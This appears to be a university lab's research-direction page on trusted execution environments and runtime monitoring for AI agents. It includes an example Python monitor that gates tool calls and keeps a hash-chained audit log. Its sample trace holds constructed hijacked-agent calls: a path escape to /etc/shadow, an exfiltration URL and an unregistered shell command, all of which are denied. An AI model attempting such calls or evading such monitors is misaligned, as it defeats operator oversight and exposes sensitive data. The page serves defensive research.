This research direction studies how Trusted Execution Environments (TEEs) and runtime monitoring can be used to observe agent execution and to build trusted infrastructure for LLM systems and AI agents. The goal is to make agent backends more observable, trustworthy, and resilient, especially when they run on shared cloud infrastructure and handle sensitive data.
The direction focuses on monitoring and protecting agent execution while it is happening, rather than only verifying final outputs. It combines TEEs, confidential computing, and runtime observation to support trustworthy LLM systems and agentic infrastructure.
WAVE: Leveraging Architecture Observation for Privacy-Preserving Model Oversight explores how system-level observation can support privacy-preserving monitoring of model execution, which is closely aligned with runtime monitoring for trustworthy LLM systems and agents.
SCALE: Tackling Communication Bottlenecks in Confidential Multi-GPU ML contributes infrastructure for secure and efficient confidential multi-GPU execution, which is important for building trusted backends for large-scale LLM systems and agents.
CSCI 699: Side-Channel Threats in Cloud and LLM Systems covers threat models that are increasingly relevant when agents and LLM systems run on shared infrastructure.
TEEs and confidential computing provide isolated execution, protection of agent state (such as memory and secrets) while it is in use, and a basis for secure multi-tenant infrastructure.
Verifiable AI remains closely related because agent systems also need execution integrity, auditability, and trustworthy model-serving pipelines.
Key open problems include: how to observe agent execution through a TEE or a runtime monitor; how to isolate tool execution so that a misbehaving tool call stays contained; how to protect long-lived memory and secrets; how to build trusted infrastructure for LLM systems and agents; and how to defend agent backends against cloud- and hardware-level leakage such as side channels.
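To make the first two problems concrete, the following is an added example and not code from the SEPT Lab or from any of the papers listed above. It models the monitoring point between an agent's planner and its tools: every tool call passes through a monitor that checks the tool against an allowlist and per-tool argument rules, enforces a per-session call budget, and appends a hash-chained audit record. The tool implementations, the sandbox root, the host allowlist, and the sample agent trace are all constructed for the example; the chain head is the value an attestation report would cover, but the TEE itself is assumed rather than implemented here.

```python
"""Policy-enforcing runtime monitor for agent tool calls (added example)."""
import hashlib
import json
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional, Tuple

# Constructed tool implementations standing in for real file and network tools.
def read_file(path: str) -> str:
    return f"<contents of {path}>"

def http_get(url: str) -> str:
    return f"<response from {url}>"

SANDBOX_ROOT = "/sandbox/"                              # assumed sandbox location
ALLOWED_HOSTS = ("https://api.example.internal/",)      # assumed egress allowlist

# Per-tool argument policies: return None if allowed, otherwise a denial reason.
def file_policy(args: dict) -> Optional[str]:
    path = args.get("path", "")
    if ".." in path or not path.startswith(SANDBOX_ROOT):
        return "path escapes sandbox root"
    return None

def http_policy(args: dict) -> Optional[str]:
    if not args.get("url", "").startswith(ALLOWED_HOSTS):
        return "host not on allowlist"
    return None

@dataclass
class ToolSpec:
    fn: Callable[..., str]
    policy: Callable[[dict], Optional[str]]
    budget: int                      # maximum allowed calls per agent session

@dataclass
class ToolMonitor:
    tools: Dict[str, ToolSpec]
    log: List[dict] = field(default_factory=list)
    head: str = "0" * 64             # genesis value of the audit hash chain
    calls: Dict[str, int] = field(default_factory=dict)

    def _record(self, entry: dict) -> None:
        # Each record commits to the previous one, so editing or deleting
        # any entry changes every later hash and the chain head.
        entry["prev"] = self.head
        entry["hash"] = hashlib.sha256(
            json.dumps(entry, sort_keys=True).encode()).hexdigest()
        self.log.append(entry)
        self.head = entry["hash"]

    def call(self, name: str, args: dict) -> Tuple[bool, str]:
        """Gate one tool call: unknown tool, policy violation, or exhausted budget => deny."""
        spec = self.tools.get(name)
        if spec is None:
            reason: Optional[str] = "unknown tool"
        else:
            reason = spec.policy(args)
            if reason is None and self.calls.get(name, 0) >= spec.budget:
                reason = "budget exhausted"
        if reason is not None:
            self._record({"tool": name, "args": args, "decision": "deny", "reason": reason})
            return False, reason
        self.calls[name] = self.calls.get(name, 0) + 1
        result = spec.fn(**args)
        # Log a digest of the result, not the result itself, so the audit
        # trail does not become a second copy of sensitive data.
        self._record({"tool": name, "args": args, "decision": "allow",
                      "result_sha256": hashlib.sha256(result.encode()).hexdigest()})
        return True, result

def verify_chain(log: List[dict]) -> bool:
    """Recompute every hash from genesis; any tampered or removed entry fails."""
    prev = "0" * 64
    for entry in log:
        body = {k: v for k, v in entry.items() if k != "hash"}
        if body.get("prev") != prev:
            return False
        if hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest() != entry["hash"]:
            return False
        prev = entry["hash"]
    return True

def build_monitor() -> ToolMonitor:
    return ToolMonitor(tools={
        "read_file": ToolSpec(read_file, file_policy, budget=1),
        "http_get": ToolSpec(http_get, http_policy, budget=5),
    })

# Constructed agent trace: two legitimate calls followed by calls a hijacked
# agent might attempt (path escape, exfiltration, unregistered tool, over-budget).
SAMPLE_TRACE = [
    ("read_file", {"path": "/sandbox/notes.txt"}),
    ("http_get", {"url": "https://api.example.internal/v1/items"}),
    ("read_file", {"path": "/sandbox/../etc/shadow"}),
    ("http_get", {"url": "https://attacker.example/exfil"}),
    ("shell", {"cmd": "id"}),
    ("read_file", {"path": "/sandbox/other.txt"}),
]

def run_trace(monitor: ToolMonitor, trace) -> List[Tuple[bool, str]]:
    return [monitor.call(name, args) for name, args in trace]

if __name__ == "__main__":
    m = build_monitor()
    for (name, _), (ok, msg) in zip(SAMPLE_TRACE, run_trace(m, SAMPLE_TRACE)):
        print(f"{'ALLOW' if ok else 'DENY '} {name}: {msg}")
    print("chain head:", m.head, "valid:", verify_chain(m.log))
```

The monitor denies by default: a tool that was never registered, an argument outside policy, or a call past its budget is refused and still logged, so the audit trail records attempts as well as successes. In a deployment of the kind this page describes, the monitor and its chain head would live inside the TEE and the head would be bound into the attestation report; the policy and budget values here are placeholders for whatever the operator actually requires.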
The SEPT Lab studies systems and security problems that naturally connect to the foundations of AI agent security, especially where secure execution and trustworthy infrastructure meet modern AI workloads.